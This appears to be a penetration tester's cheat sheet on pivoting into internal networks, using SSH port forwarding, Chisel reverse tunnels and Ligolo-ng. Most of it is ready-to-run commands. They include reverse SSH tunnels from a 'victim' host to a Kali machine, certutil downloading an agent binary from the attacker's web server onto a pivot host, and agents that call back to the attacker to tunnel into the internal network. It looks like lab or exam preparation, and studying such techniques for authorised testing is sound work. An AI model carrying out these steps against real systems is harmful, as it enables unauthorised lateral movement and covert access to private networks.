Port Forwarding

SSH

Method 1:

On Kali machine:
 sudo systemctl start ssh
 nano /etc/proxychains.conf
  # Append socks5 127.0.0.1 <port>
  # Append proxychains infront of any command targeted at the internal network moving forward

On Victim machine:
 ssh -N -R <port> kali@192.168.45.x

Method 2:

ssh <user>@<IP> -L <port>:127.0.0.1:<port>
 # Target 127.0.0.1:<port> to access the target machine's "hidden" port

Chisel

GitHub - jpillora/chisel: A fast TCP/UDP tunnel over HTTPGitHub

On Kali machine:
    ./chisel_linux server -p 8001 --reverse


On Pivot machine:
    .\chisel.exe client <Kali IP>:8001 R:3306:<Target IP>:3306
    
    OR

    .\chisel.exe client <Kali IP>:8001 R:socks

Ligolo-ng

Set up ligolo

GitHub - nicocha30/ligolo-ng: An advanced, yet simple, tunneling/pivoting tool that uses a TUN interface.GitHub

On Kali Machine:
    sudo ip tuntap add user kali mode tun ligolo
    sudo ip link set ligolo up
    sudo ip route add <Internal net>/24 dev ligolo

    mkidr ligolo && cd ligolo
    
    mkdir proxy && cd proxy
    wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.5/ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz
    tar -xf ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz && rm ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz
    
    cd ..
    
    mkdir ../agents && cd ../agents
    mkdir windows && cd windows
    wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.5/ligolo-ng_agent_0.7.5_windows_amd64.zip
    unzip ligolo-ng_agent_0.7.5_windows_amd64.zip && rm ligolo-ng_agent_0.7.5_windows_amd64.zip
    
    cd ..
    
    mkdir linux && cd linux
    wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.5/ligolo-ng_agent_0.7.5_linux_amd64.tar.gz
    tar -xf ligolo-ng_agent_0.7.5_linux_amd64.tar.gz && rm ligolo-ng_agent_0.7.5_linux_amd64.tar.gz
    
    cd ..
    
    python3 -m http.server 80 

On MS01:
    certutil -urlcache -split -f http://192.168.45.200/<platform>/agent.exe

Initiate tunnel

On Kali Machine (~\ligolo\proxy):
    ./proxy -selfcert
    # Take note of the port this service starts on

On MS01:
    agent.exe -connect <kali IP>:<ligolo service port> -ignore-cert
        # Default port is: 11601
    
Once Agent joins the Server, Return to Kali terminal:
    session
    <enter>
    ifconfig # Verify interfaces of agent
    start # Creates a tunnel that allows our kali to access the internal network
    
    # Add listeners based on what you want the internal network to reach you for, then they will connect to the pivot machine via specified port
    listener_add --addr 0.0.0.0:<pivot port> --to <destination IP>:<destination port> 
    listener_list # Verify listener added

Now you can reach the internal network directly like is just part of your network
Just that the internal machines are talking to your proxy (pivot point) instead of directly to you

Last updated 7 months ago